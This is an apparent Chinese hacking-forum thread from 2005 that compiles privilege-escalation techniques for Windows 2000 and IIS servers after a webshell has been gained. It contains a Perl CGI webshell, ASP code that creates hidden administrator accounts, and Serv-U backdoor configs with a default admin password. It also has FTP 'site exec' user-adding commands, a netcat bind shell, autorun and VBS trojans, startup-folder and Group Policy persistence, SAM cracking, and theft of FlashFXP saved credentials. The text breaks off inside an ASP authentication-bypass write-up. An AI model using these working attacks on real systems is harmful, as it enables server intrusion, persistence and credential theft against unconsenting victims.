 C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\ 这里下他的GIF文件，在本地安装pcanywhere上去

3.SAM破解

 C:\\WINNT\\system32\\config\\ 下他的SAM 破解之

4.SU密码夺取

 C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\

 引用：Serv-U，然后本地查看属性，知道路径后，看能否跳转
 进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP




利用SERV-U做一个隐藏的后门


现在大多数的WINDOWS服务器都使用SERV-U做FTP服务器，直到serv-u5.2版为止仍然存在本地权限提升漏洞，在获得了最高控制权限之后，需要留下一个隐蔽的后门，以备我们下次光临。查看，serv-u的帮助文件可知，serv-u提供了一个扩展的接口，通过这个接口可以管理用户的的访问权限。所以我们就很容易就根据这个接口留下一个后门。
下面是我写的一个扩展程序，实现的功能是，如果是帐号lgsr来登陆，就不需要密码，同时把服务器的C:\盘映射到该帐号的主目录，同时赋予lgsr帐号的远程管理权限。
下载地址为：
http://www.yueyong.net/down/ServuBack.rar
安装方法：
ServuBack.rar解压，把servu.dll上传到肉鸡上serv-u安装目录，把打开配置文件ServUDaemon.ini，在文件末尾添加
[EXTERNAL]
ClientCheckDLL1=servu.dll
保存，重新启动，serv－u服务，OK，现在在本地打开SERV-U的管理程序
ServUAdmin.exe，右键新建一个服务器，输入肉鸡的IP地址，帐号lgsr,密码随便填，再填上肉鸡的FTP端口
连接，好了，现在可以远程管理肉鸡上的FTP了，可以随便添加帐号，修改帐号。
另外可以直接用FTP软件用帐号lgsr登陆，密码随便填，就可以访问肉鸡的C盘，上传，修改文件，并具有执行权限。


在肉鸡的SER-U管理程序并不会显示lgsr这个帐号在帐号列表里面，但是当用lgsr帐号连接时时可以看到连接的帐号名和IP地址的



Access1=d:\\|RWAMELCDP
Access1=f:\\|RWAMELCDP
SKEYValues=
这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限

5.c:\\winnt\\system32\\inetsrv\\data\\

 引用：就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去，然后执行

6.SU溢出提权

 这个网上教程N多 不详细讲解了

7.运行Csript

 引用：运行"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

8.脚本提权

c:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动"写入bat，vbs

9.VNC

 这个是小花的文章 HOHO

 默认情况下VNC密码存放在HKCU\\Software\\ORL\\WinVNC3\\Password

 我们可以用vncx4

 破解它，vncx4使用很简单，只要在命令行下输入

 c:\\>vncx4 -W

 然后顺序输入上面的每一个十六进制数据，没输完一个回车一次就行了。

10.NC提权

 给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了

11.工程学之GUEST提权
 很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜可能用户密码一样 也可能是他QQ号 邮箱号 手机号 尽量看看 HOHO

12.IPC空连接

 如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令

13.替换服务

 这个不用说了吧？个人感觉相当复杂

14.autorun .inf

 autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信他不运行

15.desktop.ini与Folder.htt

 引用：首先，我们现在本地建立一个文件夹，名字不重要，进入它，在空白处点右键，选择“自定义文件夹”（xp好像是不行的）一直下点，默认即可。完成后，你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件，（如果你看不到，先取消“隐藏受保护的*作系统文件”）然后我们在Folder setting目录下找到Folder.htt文件，记事本打开，在任意地方加入以下代码： 然后你将你的后门文件放在Folder setting目录下，把此目录与desktop.ini一起上传到对方任意一个目录下，就可以了，只要等管理员浏览了此目录，它就执行了我们的后门

16.su覆盖提权

 本地安装个su，将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉，重起一下Serv-U，于是你上面的所有配置都与他的一模一样了

17.SU转发端口

 43958这个是 Serv －U 的本地管理端口。FPIPE.exe上传他，执行命令： Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u，新建一个服务器，IP填对方IP，帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了

18.SQL帐户密码泄露

 如果对方开了MSSQL服务器，我们就可以通过用SQL连接器加管理员帐号（可以从他的连接数据库的ASP文件中看到），因为MSSQL是默认的SYSTEM权限。

 引用：对方没有删除xp_cmdshell 方法：使用Sqlexec.exe，在host 一栏中填入对方IP，User与Pass中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect，连接上后就可以在CMD一栏中输入你想要的CMD命令了

19.asp.dll

 引用：因为asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定相同)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"
好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去
了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\\Inetpub\\AdminScripts>这个目录下.
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.

20.Magic Winmail

 前提是你要有个webshell 引用：_blank>http://www.eviloctal.com/forum/read.php?tid=3587这里去看吧

21.DBO……

 其实 提升权限的方式很多的 就看大家怎么利用了 HOHO加油吧 将服务器控制到底！


[此贴子已经被作者于2005-6-23 23:29:59编辑过]
--------------------------------------------------------------------------------

-- 作者：右边草
-- 发布时间：2005-6-21 8:28:38

--
这是什么？
--------------------------------------------------------------------------------

-- 作者：lobo
-- 发布时间：2005-6-23 23:30:14

--

转自http://blog.77169.com/cat
提升权限终极技巧
作者：黑狼

个人总结如下：
1: C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\
3.C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\
如果有权限修改ServUDaemon.ini，加个用户上去，密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
Access1=d:\\|RWAMELCDP
Access1=f:\\|RWAMELCDP
SKEYValues=
这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:\\winnt\\system32\\inetsrv\\data\
5.看能否跳转到如下目录
c:\\php, 用phpspy
c:\\prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\\r\\n\\r\\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\\//ig;
$execthis = $_;
syswrite(STDOUT, "

\\r\\n", 13);
open(STDERR, ">&STDOUT") || die "Can\'t redirect STDERR";
system($execthis);
syswrite(STDOUT, "\\r\\n

\\r\\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行，可以试试 pl 扩展呢，把刚才的 cgi 文件改为 pl 文件，提交 _blank>http://anyhost//cmd.pl?dir
显示"拒绝访问"，表示可以执行了！马上提交：先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe
返回：
Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
现在是 IUSR 权限，提交：
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F"
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F"
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F"
_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe "cacls.ex ... /G everyone:F"
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员：

_blank>http://anyhost//cmd.pl?c\\perl\\bin\\su.exe " net l ... s IUSR_anyhost /add"


6.可以成功运行"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

7.还可以用这段代码试提升，好象效果不明显
<%@codepage=936%><%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user","an85$")
od.SetPassword "an85" <-----密码
od.SetInfo
Set of=GetObject(oz&"/an85$,user")
oe.Add(of.ADsPath)
Response.write "一个超级帐号建立成功!"%>


用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next \'查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"
"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>

8.C:\\Program Files\\Java Web Start\\
这里如果可以，一般很小，可以尝试用jsp的webshell，听说权限很小，本人没有遇见过。

9.最后了，如果主机设置很变态，可以试下在c:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动"写入bat，vbs等木马。

等到主机重启或者你ddos逼它重启，来达到权限提升的目的。


总结起来说就是，找到有执行和写入的目录，管他什么目录，然后上传提升工具，最后执行，三个字"找" "上""执"

以上是本人的拙见，大家有什么好的方法多多分享


通过webshell获得admin全攻略 话说到花了九牛二虎的力气获得了一个webshell，
当然还想继续获得整个服务器的admin权限，正如不想得到admin的不是好黑客～
嘻嘻～～好跟我来，看看有什么可以利用的来提升权限
****************************************************************************
第一
如果服务器上有装了pcanywhere服务端，管理员为了管理方便
也给了我们方便，到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就ok了
****************************************************************************
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里，那么就会用到ftp，服务
器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写～



好开始把，首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖，
启动servu添加了一个用户，设置为系统管理员，目录C:\，具有可执行权限
然后去servu安装目录里把ServUDaemon.ini更换服务器上的。



用我新建的用户和密码连接～
好的，还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id           //刚才添加的用户
331 User name okay, please send complete E-mail address as password.
Password:password           //密码
230 User logged in, proceed.
ftp> cd winnt             //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32             //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe
文件加用户。



如果提示没有权限，那我们就
把后门（server.exe） 传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)



存为xx.vbe
这个教本的作用是建立user用户密码为pass
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他 C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本.
接下来就是等了.等他登陆.
****************************************************************************
第三
就是先检查有什么系统服务，或者随系统启动自动启动的程序和管理员经常使用的软件，
比如诺顿，VAdministrator，金山，瑞星,WinRAR甚至QQ之类的，是否可以写，如果可以就修改其程序，
绑定一个批处理或者VBS，然后还是等待服务器重启。
****************************************************************************
第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码，可能会有所
收获等等。
****************************************************************************
第五
使用Flashfxp也能提升权限，但是成功率就看你自己的运气了
首先找到FlashFXP文件夹，打开(编辑)Sites. dat，这个文件这是什么东西密码和用户名，
而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中，替换我本地的相应文件。然后会发现
打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦～～嘻嘻～



唔？？不对啊，是来提升权限的啊，晕，接着来别半途而废。
大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。经过用xp星号密码
查看器查看，然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示，
然后最终把这个网站管理员的密码从这堆东西中找
出来。那么下一步就可以链接这些新的服务器啦～～
经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地
还原对方管理员的各个站点的密码。
****************************************************************************
第五



WIN2K+IIS5.0默认情况下应用程序保护选项是"中（共用的）"，这时IIS加载isapi是用的
iwam_computername用户身份执行。
但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名，并且没有做目录限制，
以SYSTEM权限加载的isapi有：
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll



所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug，比如请求/scripts/test
%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的
远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题，就是"/"、"\"只识别了一个
"/"，所以如果请求里面使用"\"，就会错误的处理包含文件路径，有可能泄露东西或者出现权限
漏洞，这种漏洞很多别的地方（ php、asp等）也还存在。



加载这些isapi不是单以文件名做依据了，而是加了路径，应该是修正了此问题。
一般默认情况下是：
1、 idq.dll       d:\winnt\system32\idq.dll
2、 httpext.dll     d:\winnt\system32\inetsrv\httpext.dll
3、 httpodbc.dll   d:\winnt\system32\inetsrv\httpodbc.dll
4、 ssinc.dll     d:\winnt\system32\inrtsrv\ssinc.dll
5、 msw3prt.dll     d:\winnt\system32\msw3prt.dll
6、 author.dll     D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll
7、 admin.dll     D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll
8、 shtml.dll     D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll
9、 sspifilt.dll   d:\winnt\system32\inetsrv\sspifilt.dll
10、compfilt.dll   d:\winnt\system32\inetsrv\compfilt.dll
11、pwsdata.dll     d:\winnt\system32\inetsrv\pwsdata.dll
12、md5filt.dll     d:\winnt\system32\inetsrv\md5filt.dll
13、fpexedll.dll   D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll



正常情况下这些路径都guest不能写,但如果配置不好，这些路径iis user能够写了就一样可以提升权限了



可以把ISAPIHack.dll上传到IIS的可执行目录，文件名可叫ssinc.dll或者admin.dll等（上面列的13个文件名之一）。
然后等待IIS重启加载此dll，就可以获得权限了
****************************************************************************
第六



下载系统的 %windir%\repair\sam.*（WinNT 4下是sam._ 而Windows 2000下是sam）文件，
然后用L0pht等软件进行破解，只要能拿到，肯花时间，就一定可以破解。
****************************************************************************
第七
PipeUpAdmin（Windows 2000下）, 在本机运行可以把当前用户帐号加入管理员组。普通用户
和Guests组用户都可以成功运行。
****************************************************************************
第八
Serv-u Ftp Server 本地权限提升漏洞：
很多主机的C:\Documents and Settings\All Users\ Documents目录以
及下边几个子目录Documents没有设置权限，导致可以在这个目录上传并
运行Exp.
直接上传了serv-u local exploit 和nc,
并且把serv-u的本地提升权限的名字命名为su.exe
文件就放在C:\Documents and Settings\All Users\ Documents,
然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。
具体命令：
建立用户: serv-u.exe "cmd"
>USER xl
>PASS 111111



反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"



WEBSHELL权限提升

动网上传漏洞，相信大家拿下不少肉鸡吧，但是都是WEBSHELL，不能拿到系统权限，要如何拿到系统权限呢？这正是我们这次要讨论的内容
OK，进入我的WEBSHELL      
啊哈，不错，双CPU，速度应该跟的上，不拿下你我怎么甘心啊
输入密码，进入到里面看看，有什么好东西没有，翻了下，好像也没有什么特别的东西，看看能不能进到其他的盘符，点了下C盘，不错不错，可以进去，这样提升就大有希望了
一 serv－u提升
OK，看看他的PROGRAME里面有些什么程序，哦，有SERV-U，记得有次看到SERV-U有默认的用户名和密码，但是监听的端口是43958，而且是只有本地才能访问的，但是我们有端口转发工具的啊，不怕。先看看他的SERV-U的版本是多少，telnet XXX.XXX.XXX.XXX 21
显示竟然是3.0的，唉，不得不说这个管理员真的不称职。后来完毕后扫描了下，也只有FTP的洞没有补。既然是这样，我们就开始我们的提升权限了
上传FPIPE，端口转发工具， 图三
在运行CMD命令里输入d:\wwwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口
然后打开我们自己机子上的SERV-U，点Serv－U服务器，点菜单栏上的的服务器，点新建服务器，然后输入IP，输入端口，记得端口是刚刚我们转发的81端口。服务名称随便你喜欢，怎么样都行。然后是用户名：LocalAdministrator 密码：#l@$ak#.lk;0@P   (密码都是字母)
确定，然后点刚刚建的服务器，然后就可以看到已有的用户，自己新建一个用户，把所有权限加上。也不锁定根目录
接下来就是登陆了，登陆FTP一定要在CMD下登陆，
进入后一般命令和DOS一样，添加用户的时候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果对方开了3389的话，就不用我教你怎么做了，没开的话，新建立IPC连接，在上传木马或者是开启3389的工具
二
auto.ini 加 SHELL.VBS

autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序，还要一个木马程序，但是语句就和最后两句一样，通过CMD执行木马程序
三
Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini，还有你的木马或者是VBS或者是什么，放到对方管理员最可能浏览的目录下，觉得一个不够，可以多放几个
Folder.htt添加代码

但是后门和这两个文件必须要放到一块，有点问题，可以结合启动VBS，运行结束后，删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上

四
replace
替换法，可以替换正在执行的文件。用这个几乎可以马上得到权限，但是我没有做过试验，可以试下，将对方正在执行的文件替换为和它文件名一样的，捆绑了木马的。为什么不直接替换木马呢？如果替换的是关键程序，那不是就直接挂了？所以还是捆绑好点
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]

[/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2]



[/R] [/S] [/W]



　[drive1:][path1]filename 指定源文件。
　[drive2:][path2] 指定要替换文件的
　　　　　　　　　　　　　 目录。
　/A 把新文件加入目标目录。不能和
　　　　　　　　　　　　　 /S 或 /U 命令行开关搭配使用。
　/P 替换文件或加入源文件之前会先提示您
　　　　　　　　　　　　　 进行确认。
　/R 替换只读文件以及未受保护的
　　　　　　　　　　　　　 文件。
　/S 替换目标目录中所有子目录的文件。
　　　　　　　　　　　　　 不能与 /A 命令选项
　　　　　　　　　　　　　 搭配使用。
　/W 等您插入磁盘以后再运行。
　/U 只会替换或更新比源文件日期早的文件。
　　　　　　　　　　　　　 不能与 /A 命令行开关搭配使用
这个命令没有试验过，看能不能替换不能访问的文件夹下的文件，大家可以试验下
五
脚本
编写一个启动/关机脚本配置文件scripts.ini，这个文件名是固定的，不能改变。内容如下：

[Startup]
0CmdLine=a.bat
0Parameters=

将文件scripts.ini保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts"
A.BAT的内容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator XXX
这样可以恢复你想要得任意用户名的密码，也可以自己增加新的用户，但是要依赖重启，还有就是对SYSTEM32有写的权限
六
SAM
如果可以访问对方的SYSTEM32的话，删除对方的SAM文件，等他重启以后就是ADMIN用户密码为空
突然又有了想法，可以用REPLACE命令替换的吗，可以把你的SAM文件提取出来，上传到他的任意目录下，然后替换。不过不知道如果对SYSTEM32没有权限访问的话，能不能实现替换


使用FlashFXP来提升权限 最近各位一定得到不少肉鸡吧:)，从前段时间的动网的upfile漏洞， 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎，大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题 呵呵，很少有人能作一口气完成。关键还是在提升权限上做个问题上，不少服务器设置的很BT，你的asp木马可能都用不了，还那里 来的提升啊。我们得到webshell也就是个低级别的用户的权限，各种提升权限方法是可谓五花八门啊，如何提升就看你自己的妙 招了。
其一，如果服务器上有装了pcanywhere服务端，管理员为了便于管理也给了我们方便，到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。
其二，如果对方有Serv-U大家不要骂我啊，通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问 题吧。
其三，通过替换系统服务来提升。
其四，查找conn和config这类型的文件看能否得到sa或者mysql的相关密码，可能会有所收获等等。
本人在一次无聊的入侵过程中发现了这个方法，使用Flashfxp也能提升权限，但是成功率高不高就看你自己的运气了:)
本人在www.xxx.com 通过bbs得到了一个webshell，放了个小马(现在海阳的名气太大了偶不敢放)，而且已经将一段代码插入了N个文件中，够 黑吧。提升权限没时间做。在我放假回家后，一看我晕bbs升级到动网sp2了我放的小马也被K了，人家的BBS是access版 本的。郁闷啊！突然想起我将一个页面插入了asp的后门，看看还有没有希望了。输入www.xxx.com/xx.asp?id =1 好家伙，还在！高兴ing
图1
于是上传了一个asp的脚本的后门，怎么提升权限呢?
在这个网站的主机上游荡了N分钟，在C:\ Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2，于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名，而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中，替换我本地的相应文件会怎么样呢?
于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。乖 乖发财了
对方管理员通过flashfxp连接的各个站点都在图3，点击连接。通过了于是我们又有了一堆肉鸡，我们有ftp权限。上传脚本 木马~ 呵呵。
说了半天这提升权限的事情一点没讲啊
不要急，大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。可惜啊！
又想起了在Sites.dat中也显示了密码和用户名，而且密码是加密的。
现在的星号密码会不会也是加了密的?看看就行了呗。
怎么看? 菜鸟了吧 手头有个不错的查看星号的软件，就是xp星号密码查看器，通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧
下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码，还真有点怀念当年玩sniff的时光。呵呵
密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密码和用户名已经作了必要的修改)
这么多的信息，按工程学的概念来说，没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。
我想这个问题应该反馈到flashfxp官方，让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户 名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到fla shfxp的时候能想到这个方法，至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。

将asp权限提到最高by: cnqing from:http://friend.91eb.com
本来是要写个提权asp木马的，可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说，说的太麻烦没有必要。懂了就行。
原理：
asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system
方法：
第一步。
得到inprocesslsapiapps内容，用命令"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。
第二步
写一个bat内容为"cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" ·····
省略号为复制下的内容。中间用空格分开不要带回车符
最后运行这个bat就行了。
例如：
我用"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"得到
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\System32\msw3prt.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_aut\author.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_adm\admin.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\shtml.dll"


那么你的bat就应该是：

cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\System32\msw3prt.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_aut\author.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_adm\admin.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\shtml.dll"


已测试成功！！

利用%5c绕过验证

利用%5c绕过验证

---------------------------------------
lake2（http://mrhupo.126.com）
2004-11-27
---------------------------------------

说到%5c，你是不是想起了当前流行的那个%5c暴库漏洞，呵呵，本文就是对%5c利用的探索（呵呵，当然有我提出的新东东，或许对你有帮助哦^_^）。

好，我们先追根溯源，找到那个漏洞的老底。看看绿盟2001年的漏洞公告：http://www.nsfocus.net/index.php?ac...iew&bug_id=1429

N年以前利用这个漏洞可以实现目录遍历，虽然微软出了补丁，不过好像补丁是用来限制iis只能访问虚拟目录的，所以漏洞还是存在，只不过利用方式变了。对iis来说，提交一个含有%5c的url能够找到文件，但是该文件里以相对路径引用的其他文件却找不到了（%5c是\的url编码，iis跳转到上一级目录去找，当然找不到；头晕了吧，哈哈，我也头晕啊）。

后来这个漏洞就被牛人挖掘出来了，也就是传说中的%5c暴库：由于连接数据库的文件引用的相对路径，提交%5c找不到文件，所以导致出错，iis就会老老实实的说出数据库的路径（不明白？找google）。

一个偶然的机会我发现还可以利用%5c绕过asp的验证；当我们暴库失败的时候不妨试试。

废话少说，看下面的代码：


<%
guest_user=trim(request("guest_user"))
guest_password=trim(request("guest_password"))
Set rs= Server.CreateObject("ADODB.Recordset")
sql="select * from admin where id=1"
rs.open sql,conn,3,2
readuser=rs("guest_user")
readpassword=rs("guest_password")
if readuser<>guest_user or readpassword<>guest_password then
response.write "请输入正确地管理员密码！"
response.end
else
session("admin")=1 '登陆后写入seesion中保存
response.write("登陆成功，请返回信息页")
end if
%>


看到没有，要想通过验证必须让数据库里的用户名密码与提交的一致；想到什么？让我们再看看数据库连接文件代码：

<%
on error resume next
